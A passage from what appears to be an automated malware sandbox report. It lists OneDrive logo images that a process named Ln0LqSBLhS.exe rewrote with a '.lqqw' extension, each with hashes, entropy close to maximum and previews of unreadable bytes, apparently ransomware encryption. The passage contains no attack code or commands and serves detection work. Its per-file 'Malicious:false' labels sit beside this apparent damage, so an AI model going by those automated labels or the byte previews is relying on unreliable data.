                                                                                                                                                                                                    SHA-512:3837A641E0293EB259693DE72939E536D2B70DAAA13DDA129F3B054191D222F3474B28BB300255CF4DF1E6488F11DFE887EA4FCA2FD333B541FBDECE9CD309CE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...o.(.W-+.2.q.z.}..N..h .4.....y.3^..d.-5..$..?#X.*f5e5.....I.B:^.Dd.}q..j.&....z.''....e.{k.<"..P.i..{3.6u.6...$..a.H...q........6...o>....>.=....b[..r.A9D6lI./.."..".e.:.... PMV.........$.1..px.<wO.k.N.M.....{.....X......m..%...\`.."..w......R...-]......M/..z.U..r,.b..%......*. ..{..j&..~.z.......4C1..O.1..a.._<j.....q..(......%.8I.A.\. p..J#..h.k.u...Yx.f.~L.K....@.I.K...cR9i.3d*........,...X...X!@x...Qu.^gIO......whc..E...#..2.@L#J......1>V..._v.k............4.T....G.S........P.Y|..{.0=.".o.)YM.:..V5{"".Wg,.`.;j..x....>..R...U._...I.8I...Z.kCwo....).o..P..........R.=..w6H.0...8j..d..D..i.F.....U...~........e.@.dX.(...gp.....S..b.>.vp.x..D\.wW-.......r....[.]3....?...FU.Q...E....gV.D.&5'.|...E.X.C1._......O...I.._...I......^...Fn......J@..&.A..~I......m..}..,..././K.^..Kl.....q...G..;.J@m..b~.1..<L..i..$>M...ZD.$.......zw...':.r$.A..|..I5.*...yTH.]6.....[.7../.S.c...E..+pV..#....?....n..F.%|....<..G.c...4....b../S.g.......{.y.~
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:"compact bitmap" format (Poskanzer)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4003
                                                                                                                                                                                                    Entropy (8bit):7.956080703091337
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:OG3uSTIUm35S6zd3rEnWtWBIp6KDwa6Ea8Y+:frRHMsKUa6Ed7
                                                                                                                                                                                                    MD5:8111B9383BE1D8ABF1C8DBAA70818075
                                                                                                                                                                                                    SHA1:3882BBA60EA6E3677D6BF9676B81BA58EEA54022
                                                                                                                                                                                                    SHA-256:BC26AD94491576EB01678C551F42ADCD9A2B8BC9F55919294A68CF97F06E4ABA
                                                                                                                                                                                                    SHA-512:C5AB3FC255937E8ACB88DAFB89F18C8B72C25B3D7513F93ADFB7DBE8F78F14280BD6F30D17A8C3D75B4672FCA37801D4F18C51A8397E0F184CD5393CC8373F04
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .*..v.Q..`y..:+Yo...,....O.f....<[.<.>1...]..b...._?...<.rV.. ...k..h.: Y.,.~.'..].f?....+/~.c....fks..%kvx....<.(\Q...C....G..)...6E..:.m'zr.D.;...Y.ok....N6|.h.%.......oH..f.o...3..osQ.qi]..,.Wi..K....t.X[R....p...n..H.....f..~..}.jC.p.9)Xo....z...W.eRx`h.P.=6....(..k.z0..`....>....6.s.....`0.f9...Y.|r...../.....p..z..]g.N. 8..{(e.Y..S]._t.....#....!..~..s.w.N..B=.\.TVo...?..|.a+m?=.......U..%c.&MMs..0.,.C1p..c7h.w.f.o.L.......n..M......Ej"x....C+.4.,.t....b.G..Q.s.sb.}.......G&@...,Op.l.v.CS..R-.l.3.....y.EO.8~.......8.V...F....op'P4...;..O.<.U:j88.8Je3.....mv..B.e..?[..........b`.NQ/7.#Gl;.......O..~..K.[.f.w....x=.vsI.S........0q........H.....i1../.!.~...G...%..v.d4y'..&T..DP,.=(vg+nA.L.L.X.E.*....?.wQ.......a../.../.|I.....E.3%.h.F...4.:....Z..Dn.uhK4qk4....a..b.u...Y.E...~..J...W..T...5.....r...%.&.:.M?..a....<...3.Hg.A.M.7.%.*\.w..........O..VWV.....`...A..(...H<.|.RR$o..(/v.I.<....[UX..y-....C(..moi..J.H.B.U..C....JJ.uA.RSU.Y.`$
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-200.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4888
                                                                                                                                                                                                    Entropy (8bit):7.962351136472686
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:7G8Ib4d+4QjblcFGaW4QsGGWs43fS3MbyUEb6hmNJvvv0t4WaUmmrlURaJ8ur:9Ib4d+TGjBNusSS3wyUE2huHv3Wa/mxx
                                                                                                                                                                                                    MD5:0C949A2A2F99B493CA34C2CD7A72A836
                                                                                                                                                                                                    SHA1:B34491C8BB78AB45784A756C4EEB8685B1B5F925
                                                                                                                                                                                                    SHA-256:B82B0C0E3113DE4B75431A547AC3FDC074A0EE2DB40C5FB7E524807EA5102F71
                                                                                                                                                                                                    SHA-512:A2528AFBD143521C94051BA742D850966C6945143B44C6EBC56244D9D1FEE3480919AD3D9850CA51F57E346DEE44AA75DF5EE25BCF0FF8BA7B00FEB64A8C4E27
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: n.....'..H.VN....RB2)0..&j>..YAlb......R..9.......!D...B.gR.OhY.{...H..........w..B....(.2.K..*.0...._....W..|.....1./...x.Z..|;.V...>.hJn.t.......Z8.;.4PQC...X....1.6..s.Iv................!b(..t.D..........\F....#....K..C..4."...J..M.*.+-=a..C.h"j...+.'.....23q....b.Vs.v0.h..P.........>..^`..........hg......v...Z<.<...Fsv.......an....{........,)R7.,..#.<.5.8.......B.d...xG%}:.z.K.C.i...yw..6..xm..}=.a'<[.|4.?bF..q....B@.&.....O......'a...k.Iz.J.]F..1B]...g.#.W,-.:)...2G....g...\...m....*.....J.....BD.Zm...B.@O..^.~.......fH...1wb...#.I..!..'...b.eE...eC..?..o.)M..d%..p$......g.....B}...-.X.N.y...L..u.......ZXc\/..'...p....]......Gr.....,...!..D:..I5.5Ps.5b.A..x...`....~.7.;/!..>....B?.....X........G...c......&.....c...u{.=J7.RP.RK$u.M&$.....<.[..P.K\..ozv....F..Z=SsW.B.-.`.|0.o.2...{>j..-.\$S..AcL.c..O.aW..l."~.)..p.@-x.k...l!9..b[.9.<;q.U..j...2.`xs...H.:y.....?g....=...n .,(C@.o...NVB...O......4..4.o..... ...w1..0g..]..P.-|..\@).T,.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-400.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8738
                                                                                                                                                                                                    Entropy (8bit):7.980802882028629
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:7lbdmlQt8B70RfPw6RUPkvkjqb4MRVdIXsgy1lx:72Qt8B70RfPw6Rwkvkub4MRw8d3x
                                                                                                                                                                                                    MD5:CD5D7D10B06B23767221A069F8B51AAC
                                                                                                                                                                                                    SHA1:15C8D5486121EFD40AE46B9787578131477880BD
                                                                                                                                                                                                    SHA-256:6E6FBCE7ACC6C74902DB3F1F1B60E63580435F51309CA778A4490809280E2CAD
                                                                                                                                                                                                    SHA-512:DF07C2AC07A8BEF194835D7D21F7D9025645D29AD1BE27C2218548FF8CBCBB391B14D1E36969D0DCEFDC3B67F932C76103E0889752EF4A706F2A8F5941C76D19
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ,..ON"..W.!2.^.+......_......y..A.~Y..h...?...g_..j.....=w.2.2T...U`..v..A....1.....X.2...!pj.`.hQ\GP...i&.G.~...hq..{..v..xA.MA..qX.?....W.=s.....U..;..8-..8c.9V}.....|;...\.!P........p...\.rv..)h<4....f......L.ra59-7z,..caP..oTZ..R.U(sDv.v.....9\.m..+HU..(.......?D.._.......O...L.g...dd.J.ZS.)..pD...Chh.hN4.[Vv.{+D..w.v."C.Gc.l...gf_$7.hy1....&g.C...R2I..3w........2.{.*..s...>l.....U.. ...!n.....4..D...t.]............O..7;`w..i..!..~........?..~.njt#.R#s.....[s.0..k..|..a;+.,.o..=.CK...I...Qy..D.uqD..n.....?#=Q....../.O(...q(t...h.1.LMZ....*..Z).......]...B...@.*.D..s...V/...|...U.gT..t..`.?.........D..O....I.h....P....N.?]].X..oh.)N.....b....."h5;.o*.&)k.=........@.5...b.z...V&S...s.Z.Hw..{]HI>..0Xd7g.[....k.Ux'..qb....{...9...Hw.Z.0.$|..+A.nb....feNF.m!),.%..5aJ3.....6.c..H... ../.....h?..=.d\.t.S...._.....b1.|.e...e....=....h:..A..nJ.........y.-[0...^N...5aT........N.a...v.1.V.0.....DJ.P....p.2......l.S.a.... .Q....w$!en]...T(....K_b.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-100.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3300
                                                                                                                                                                                                    Entropy (8bit):7.938657329051502
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:sSsjC9Vg+7119DJv4RtfG1N1o0O7GaOnMt7srqNZoNldmtG25Y+Jmlao8U+xtaQD:DsajddYtub1o/7cqL6dmTTJmDCYM
                                                                                                                                                                                                    MD5:0A0163DC69CB325EA7C3B3F89578B83E
                                                                                                                                                                                                    SHA1:41A0E8155F7C866F38AE64AD9531F9659C345C71
                                                                                                                                                                                                    SHA-256:E70E7E713986F2D5AA30883C3DF8B5F7CB1C98FB7678B79BE7A054EECA83B973
                                                                                                                                                                                                    SHA-512:3BE8EFA0F77D3EF5ED1232623DCD605B5995B8E5C8B1CE8B93A844C1CE12189F65E209CD84E80EB4FDFF4C9A059CD1F3A87A1324819692C8ABFC269894F82071
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: k..u3.pB..@vY..nY=..<.X...>r.<...$s%.GM..S.....(..Y...Laz..N.8.........FE.+.^?.P.p.9M3.....X.k........../h.b...z.......(...AS..gA}..I..9...%.dm..1.e.../........d;j(..{..S...9..0...x3.0xU.6.5J..=......1 ..u..C`.'$.....9v(d...0....r..W)..d....Rb.G.....~...[..Bl...|vN............hB..TO.D.u.;_.V....._...P.j.vOh..!.U.i...K...@@I.P...I.....?.+u*-.=u...n.cm..p.iQ......1..$nY.._.kcQ......iS........7L....s.yJ..&.p....U..]..>...r'..........S.(....K!.....t..e.8.D.].W.......N.JI....3..&A..^..>.......a].(.....&...........N.Y.D./.t.C.jw.*.....S....YN?...(.*}...a,.Z.R. ............]"$.....,..Q..B`....Wh...pR...=.=....Lm<. -L....z..9Ar.7.....$..?............_...z.4u..u..eD.#......%#!.....a4q`~g...BUsxP8..%kil7S...i.l.;.|..._...W.R..7.[k..%H.t7W.?...)...=|..<.P4.....q`j....&|.5j..v.&FM.x..)...zK.....-.,.vU;..x...K?u3E..S..\.{.w. .4S..!.Jp..UEL.." .2....J.n.`.Q.R.......)..m....qT..o...J.T|...q....#.v....Q...ZO.....y....O.~&..B.!c......O.%z7o.q..=F.p.c.f]W
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-125.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4436
                                                                                                                                                                                                    Entropy (8bit):7.954115027526741
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:vWYfjEFK3Nh9EV4QePxZrrZs40OVa5X46e4DRS1qVJygX86N3vjqP:vWo3dEV4Q2rqO45X43yS1eJ/s6hvju
                                                                                                                                                                                                    MD5:A058730E96C056758C2DAD2DDC8D9432
                                                                                                                                                                                                    SHA1:2D690FF5B7DFF9B8CB8C7D69AF9E72D5E3B8C46D
                                                                                                                                                                                                    SHA-256:24EADFD5C4AFF872913A42BB8F6C06B93131465F10D258C809C74FEF3DEB36F2
                                                                                                                                                                                                    SHA-512:F64F0D833425B1A34FCB1F6ED2006F4F6FF8044268E42A2F3B20AC2A42F740DAA96CA84939255B9B085708D6235E5CA2B8BE3975749ECDA4AA0751648CFAD394
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..Rq...6!..pF..^.............VLz...K.}xo.%...J6....n..=.....&.,v..,..SZi.:..~.A....E.w......dq'..^S..I.mm..~I. .y.C...5.6.>.;......TA.<....o.8B.y3...Y..t... .b.......j..N\t....Z~y.R.....o.3.O8.H.m.............-.o......9...{$%.-U?w.U...d..[gS......G...>p....e}...}}2i..=....u?....q;p..(...._d..n....`.s.E...X.t...!N.....a.}6.4.....$o.V...#..n..3./..M.//(U..H..!.i..dW...Q.k.W.p...q%_.m...........q{..T0.W..~[.LK..{........)0'7.3....~..an...../..jp1tb&.6...u.VY 5..e.p..X.qZ.[.,.V...g.......4.x:..j.~<.......Rf.....(.,+.I..w7.:....G. X!W.N`....0..m:...7R...(..r:?..Lh...o.....xi...u.^...+.9..E.....{/.d...l._...9...3+....Y.y{B......K..T...'.{Z..H..Z.P.A.,H ..4...j.O..#^...F.V.Is=_N@....8...ab0.1....dBe..t.uT."H"w.....v<...f;.D$G...1N..-V_-...\.z."z..-=V........a5.Y...H..w.].F.....)..7..Lg.jI:N.CcW.......H..>|...?.M..........?...\.O.R...Z...;...[?u..f..........E.Z.../m.Fp4.H.B....8.S.E.T.=9z.W..........d..6XT.1[........H.{Y...p.i......ZE1$.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-150.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5627
                                                                                                                                                                                                    Entropy (8bit):7.973908770279031
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:EGi/BjrJHskg+cDVQ6cmC02opEydbDKiYTCGcbcSnWLYjIYxbCoBX:EL9H4Q6QoplvKHCGcNNv
                                                                                                                                                                                                    MD5:AA8B6D50954C587E28A895FB51973BC9
                                                                                                                                                                                                    SHA1:4F7AA276F32B5ECEFAB38534D908B11A7D9D75AA
                                                                                                                                                                                                    SHA-256:3605E6D3ACFA70D8B47656487683EBF5E54A5FF9EC9BB36CE9258DBBD48DFCA7
                                                                                                                                                                                                    SHA-512:DA1AEEB8228CC312E3AE0E98FD764C050DDCCE1A48522D91AE07A80D42E81496A979F94BF3FB10BEAA0091D64890E5426982BD3BCD702A2B693A12F1574B3B96
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: H.Xg..e..z.R..Tc./.......'.V.b.G.^u.[..H..Hp....>..._@..6q&...j.0..1B.2\...p.J.aUJ..,.H.3?ui....e....)R.fs.d...*.....jr......k0...i`P.o..A.^.c.........{%]&......`.K*j..p..;... X.k.<"B<.wp...#.D*.Z..a..&.ro:. YQcXK.1..}.....[.l...X..............~P#.....}.|h.DB......L...3r/V.u@v...U.....(.)...1.....t)gW.!+..OWO/....P(.}K.M.(.Vq.@.V..:Q.`..ZR.......bb(...].^.,6@....|.....M.=..!..A.H<.c....4....:..~.Z.P....."6.....~.........(......%V.....*h*..f\.u+.O4.lU.TQ....y..v...C.]..+8z..a...@}b.i..1..9].#..3IL........o.P<.l.>......VE=.;.......1$/.RN.DM.....)..i^..+v0.<}.....5..a0h&.n......9.x.>..4.NzT....~~$..4.Eh....O"i.Y,.m~..e..o..\.W.F.C.[..Zb..R..q.....).7r..f.r.C@.n..Y..].wN...z.7.E.{.s:.).XJ".Z).J.Y$.....;0.=.0.Z..x......=...>|..S...W%3.......y....m!..l....G......A*..........v....'.I........Q.*Y.=..\.0.&2h...<O|%/...eb.T........~K..|.0=as.P.7*.B.-<...+.....Zf...o6........tf.;.?j....6i...|I..h.....W.....&P.8..P.}?k...5.....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-200.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7273
                                                                                                                                                                                                    Entropy (8bit):7.972641705458741
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:WioYytspdvZgbEtvSvjI8y6+DivIhAzMlXyhnGwi13zVn4j4cAN6OiOq6EvW:yXq/ZgbgvSvjJvpiXyhGd1DVOYS6F
                                                                                                                                                                                                    MD5:053240A91AFA83EFACE9AD4A9F81F296
                                                                                                                                                                                                    SHA1:0C265A53EEA7876C88864B27F4CD55031430E26D
                                                                                                                                                                                                    SHA-256:46398AFB3E4E7094AAFEBBB027B4E96ADC95306CA0FD228FD9850B65F0D9F31D
                                                                                                                                                                                                    SHA-512:4083EE6352298417E62E403DCE29B9DAF9ABC3EF7B68E09B365E67C246B43F4A79DF0669CD5859D283EEAE6DEF0C4D9A4E4DACBD940362D3C80FAFF031338DC0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Qc.k....u`.6|...9:.(u....1."...)x..%?.[.ky."..J.E..6W.E..e..42PX....v....'.~.3.2#WK..A.u.!.V<.OP...y2..sX~..Jl..?..IWZ(?1n..o..~.c......o9;kH.....t.o...Z/..@.%<.W..*..i<.`A..?..C.yXVt..p..u\{..E...Dh......T.U.\M..[.Q.O.r..Y....|0W>..l.qn.[.$.lB.X5......6\.F!.H..x... .s..P.l.'s.Y....y..6L'.h5q?....#V.P......2z...........\..~...$......d.FQ..w^.....C?L.G....X......~...h..2..3...GT1>Q..K.q.d.=...gy..jM..z.[-.K}.*3y1c.=@)..n.2...*..A0[.x..B.2....N...p..!..>mkW..$V.\m.1S.x5...P.5{.....'0.U...,..Q...!@+%..,9.2.240....Fr..G|I.......z!].Z.F!6..fy...6..XxH..Z,$B=...(.$..._.G....(h.P..?V.]].My..NgG^#.o.r........).Y$..H(n....mz...3...,..xi...."...x@.....}....7.......G.G.....s.sP....w7p.(2Y..T..\.....Z.U.HL.,.....:x(w.......Y#......}.X...T...L...fL....0..[\..S..)?..;^L*...pw5/ 'YL..Pe...i.iU.g... ...........MwtC...... y.)a.HZg......}.To.9..."..../...x.Ka..1.wd^......5...T...+.K.y.A...nH"...](E#<...2..bf.vY/.#i....-...8...<.e..K.{p(u0qw#.....*Nk..;....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-400.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16261
                                                                                                                                                                                                    Entropy (8bit):7.987967565667498
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:NqowL6cr50HJVrQFCsOWvaQ8Vs59V9q93Y8tSI/zVl3l137F:NqowL6cr56KFCpST8W5pq93jl/BZzx
                                                                                                                                                                                                    MD5:6A7FAB5842E86C0E38F88BED50CA977B
                                                                                                                                                                                                    SHA1:FDBB2911959F25768E376B0E68A287F7976EEDC5
                                                                                                                                                                                                    SHA-256:285852DDC12AAE82D14AF1B3FEB964DA2E8368D1781F772A715F15860A0A16A7
                                                                                                                                                                                                    SHA-512:47AB8374949C50BF59ACA054DE4E1FFBDA32DC1513ECFC8C686B70BBA51BB4DE5E83D4F4C8D046BA743EA0062972BF57A009F47ED4721907A49BADFD9E418326
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .4....W...yF...H........l.X,).6)...u..]........kD.E.YN...r.....=.....5<..ult..8..(...(R!.d8.|.`...V.0..D.T"..c..i.j....D.0D.>..$..t.c..B.R`g........C.P...Dw..j&..i...[x".el.3...J.TO.&......$.x..V<.E... S._8....i.......N#.~=#.....p....BEi:.f..V...e'....-.z..#..mHP..49`.\..(Y.b..jG.o...r..0.3.B(........H`.,..+....\s.&....-..8.s.|.......{s9..7.B....U...5.Y..%..i..+.:.Bn..M...U...X.c.o...U......6.:.R..u...C..]..`..is+..;...]K.*+6..@..C.C..I.I....v.60&]H.9.......U..vK...[.J".U.*..9`...4.....T../.4h./6......1..u...r)3>..r0.....?.#..^=.....p.R`K=l..O!..1...Mz..9VB|.S../.....e.....m...[.z..e..d.d'..........l.,..U....*....u!.]+..V.K.....L.Q..3.....X.zc......X.....GI...D.md...B.'&......D.......H..:.u../.<+..d^.......{|.....#+.5.....t..F......nJ...;.D.<s. .4..y....s.u...2...r.a......%3......E`RO6.{.........s....<cjx...RM.H.{eqL...."2...j..4..P..`......dq.K.L._*=....nn .l..p=.....L=v.ux!_.l`<U:X)....fJ".k....lM"....;D.v...m.N...U.Ku...-....5.R.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1112
                                                                                                                                                                                                    Entropy (8bit):7.824062119930214
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:rIuxLtIDT229uny3wdhaxNaWWkqMsK3lV/Cn8NANsIAcPf6jbzPaNbD:scb290y6hGIkQK3en8u3CfjatD
                                                                                                                                                                                                    MD5:DB73D298D71A416A7253FB72C7868183
                                                                                                                                                                                                    SHA1:F3F699AF634774B378F9F88904E0A3E66A483866
                                                                                                                                                                                                    SHA-256:C55B064281BC300291B69676A82E0140D71C63694FB736CE3F223BF1E1186862
                                                                                                                                                                                                    SHA-512:6E8690FBCE7B97F9D62795DDE0D7F2FD76CB313E8D4FD45AACE880C91CDBA39987F73BC4FA9EF07C0C3268822C5C2D328F18A324076FAB6757BF78BD7D40F566
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .[..#\..59%...P...W.o,q.B.Ca.,...F...{k.P.HR...b..,.)Gu...kBc.3l.i-...C.Q..)P.y....J..a.i....Z.t.:>.".IK.z.......-.N..$B.gc.X1d.~=.'.O.....q.y..UL.dD.......#...!gl..~E:.U......'....j.s..'/..M....9...U..L.......4F....f...."N.hy.....q...$...j].Y..E6...t..\...h.=.!.#u.#.<.....2.c.~J......v...Q.bF.D.....@...(......)k....A......h.;....~S..xQ.e-u.D..a.#.$.n*....'?.vd.B....{./Q.[..Xk.K...l.:\N..-.'.L..Vg.$7..t.i+.r).....p-0........fSx5.....Ap..o.._8..U..........8.l..%.c.b.&......C..t=.p..]SS....'...f...8U.HX....gj........Id.7>W..|.*Z2../G.V:..6.-]...Keg..,d1@P...3MA.m...._.=..P..(o`..U.bd..h]``..g.>;.*u2V0..D.a..amy.i..rO.....J@. .).M..U.*..vl.......D...a.4*.X.m...v.X....4#../".y.\...T./...Z...O4e.......L.Aw .[vJhz...uW..Vd.h.&.H..N.\..G..%..Yh....m.)2.:.....(.z...e.y......V-.^..0n....%..}i...b..|~.0 .q..OP......P..np..!.#........h.M3......F...lH..!..2...~?h../..!.....NGI..c.#.[l...[C2....L.I4y.w.=..w....i.`K.)R..p.?X.d].......@..{LK
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1347
                                                                                                                                                                                                    Entropy (8bit):7.847011105686083
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:7JB4Zpl8ugopy/7umTSJF5GRoJL79Lm85pD1MifPKr3altgxAC4eiUzZ4bD:wnyimTSJF5SULtmAD1MifCTaltgYlUzQ
                                                                                                                                                                                                    MD5:6726936403B8FD6E8AB74575DC4D2213
                                                                                                                                                                                                    SHA1:85E69C5331B32EFC7D461855909D7B4323E6E55A
                                                                                                                                                                                                    SHA-256:149F3F6E1B4F77B0B06336E4EBE0F77849DDFBF1FCD6D8742D1144D9BA6CA66B
                                                                                                                                                                                                    SHA-512:000ABEAB64616F8F8F25E34B6D1638256BB2E2C37DD443A84B560438910EA8BE4D09C0B6EC4A52E10AC2302CA037F6EAD240F0791476BDCA351A941DE72D62E7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: t....j.pc......EH..b...6b..sCF.<sq....6.t{....N.o7H.A,P:....`.Q.b..>.&v.4......0C.n......$w.!....Zc......G.)..0..R.2\W_.."vgL...\.O..U3.uA.&..."..e...v};.H,...=.=O......d...)?..T.Fm.".04..d...#A}..4;..>..F4.u...zQ.kB..3>[d....9&.:n..Q....<...{.......sc.u..Q..4.UR.Xb.s.."Dz..1....z..=...@. .}.....o....l.#.MT.a...........M].V...j..G..AQ.r{.u....<I...P...:;.n...E.VN....*..l..}.....l=..A.9 qC...p..*.....P.2...$..a......0...."..!...b..Wq.W.j-..W|..F/.$.'Zv...HV..K..[..k.:BP...G .8..9Mq....\.,(.....a$..,.5{..}..||[^....#....P`M.1.:.6..z.;+.8......bH.....Z:..q....[S......_....j..?....h...... .<..ZACm.N...$......9....`<.~+.-3.7.$SM......$.?.Q[g.....yI6?.xuni.7....vA[..`.l..9@Kx.4.nj.E.}.#.....Nf.......'.k.1..N...'7@Y.2(!Cg5)..+.4.%~.+6;%...*.o*f|....r.n..Jry..m.6..A&...........F.1.:+..>..%X..1.|#.. ..w..3.[t%.L... .?m...G-..{..... .a|&.l......N..G*Z....+.:.:@.x]2jpq.F.h.]..SN.......$....l3....v...7.A.p.=.>.E^..0..0....Z........Vx(D.h......3p4..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1531
                                                                                                                                                                                                    Entropy (8bit):7.868126972403179
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:d0L6o8CtWE7050Xy/d+O+4St3z7WsdntI1bjx6ZsltejYGGPgzXbD:mL6o8fruylH+DZntI1cs/WzrD
                                                                                                                                                                                                    MD5:A5FE219BA1BA62E86DAC0D3BAD88A19E
                                                                                                                                                                                                    SHA1:9F6C85AE07C0B3A42A6A2115149170DE68B4B0A1
                                                                                                                                                                                                    SHA-256:FCDD61A964EBA1DD3EE4E18696D70D57A50B76FE9F90149BB8BD429E6D67A68C
                                                                                                                                                                                                    SHA-512:DAD62DF8274071DF7662106BB1522114E20ABD4BA9FF390167B737048E346E71CBB86CEC2A6F4521BF04A56C510601C343364B345DD8EAF9C93199D7B13A0B12
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......=.IL...-.1......Pg..R.K[._.n...E.M....,.u....f..Lay$ .....H+~]...@6...J..r..Q..{ .....[.R..,<.'.y.Nr32.k..{.YV~.z.~.....z.w&......w>D...F..Z:.....Y.m......J.iIT;....G9.*K.V.$....4k.`....k......;}...v.6..........'X.{. .orM..Z.1..Bt.k.^~.D.8...j.F.^..k.k.....V..`ku".....K..m/..OB....O.e=_T.".....D}."....G..^.sl7.ep.|7..1.\.C.M...Q.z8...szJ..8&.x.l.\.V..U. .Q.&q.l...S.R...->5.[......Q.G......,p.l..d.E.....-.@..d..`]J...u.4I.Gz..Ka.2.B.../..<3.....[&..=.|gPGR...3.6.....T..K.>xO.x.X....u7&.........I..M....x.g.J7L..)U.fU..%.P...b.$Z..4.(......Q..o!.-y...y..`>..[._....P.....<.......4dA...,.q...4#0pzZ.u.........O..9$.U.(=.(.!........6(_%.nQ...._......D..S.}-......B.S..ZM....@.7.k.,0e..C.M*.M...Tp..+-..>....H....".".k..\.1.D.s....[.Mexs.TW}y......* ...;b%;].`O..|.A>=`"..w_..%B.......v.ZX.s.J...pcm@|.p&...-.srZ.TD.Ei_PG......X.D.h..... -3I.....T.6.}...,..3%8..\.fJ~5.h..X....~$...w........h]k.........zO9...s.~.>..........\I.`.l.3....+.....
